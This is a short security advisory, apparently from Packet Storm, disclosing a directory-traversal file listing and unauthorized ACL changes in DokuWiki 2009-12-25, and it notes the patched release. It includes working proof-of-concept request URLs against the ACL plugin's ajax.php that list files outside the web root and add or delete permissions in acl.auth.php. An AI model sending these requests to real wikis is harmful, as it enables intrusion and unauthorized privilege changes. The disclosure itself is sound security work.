DocuWiki version 2009-12-25 suffers from directory traversal listing and modification vulnerabilities.
7e857cd3e239a411c25ced4db1f048f7ffa5ef6a4531a1abd4608215175dc1faReported: 13-01-2010
Patched: 13-01-2010
Released: 14-01-2010
Vulnerable version :
http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25.tgz
Patched version:
http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25b.tgz
Author: white_sheep
Contact: white_sheep@ihteam.net - https://www.ihteam.net
-------------------- Show Outside Directory
PoC :
http://localhost/plugins/acl/ajax.php?ajax=tree&ns=../pages/
The bug allows listing the names of arbitrary file on the webserver
- NOT THEIR CONTENTS.
-------------------- Arbitrary Change or Delete Wiki Permission
PoC :
http://192.168.0.100/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[save]=1&acl=(ACL)
add to acl.auth.php read or write authorization.
http://192.168.0.100/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[del]=1&acl=(ACL)
delete from acl.auth.php an eventually authorization like
(ACL).
http://192.168.0.100/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[update]=1&acl=(ACL)
delete from acl.auth.php all authorization like (ACL).
where (ACL) must be:
1 -> read
2 -> modified
4 -> creation
8 -> upload
16 -> delete
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed